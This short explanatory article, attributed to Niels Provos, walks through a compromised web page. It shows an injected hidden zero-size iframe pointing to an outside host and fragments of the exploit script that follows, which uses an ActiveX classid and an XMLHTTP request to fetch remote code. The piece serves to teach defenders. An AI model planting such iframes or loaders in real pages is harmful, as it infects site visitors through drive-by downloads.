Here is a typical example of a compromised web page. Due to a bug in a web application like phpBB2, Moveable Type or many others, the adversary was able to insert the following line of HTML into your home page:
<iframe src="http://www.somehost.com/ment/" width="0" height="0"></iframe>
[many more lines of numbers]
var var4_1="clsid:BD96C556-65A"; var var4_2="3-11D0-983A-00C04FC29E36";
ado.setAttribute("classid",var4); var xml=ado.CreateObject(var1,"");
var as=ado.createobject(var2,""); xml.Open("GET",url,0); xml.Send();
All of this with just a single line of HTML. Amazing? Right!
The actual example had some more indirections and also threw in some additional visual basic script plus some other goodies that would have complicated our explanation.
Article written by: Niels Provos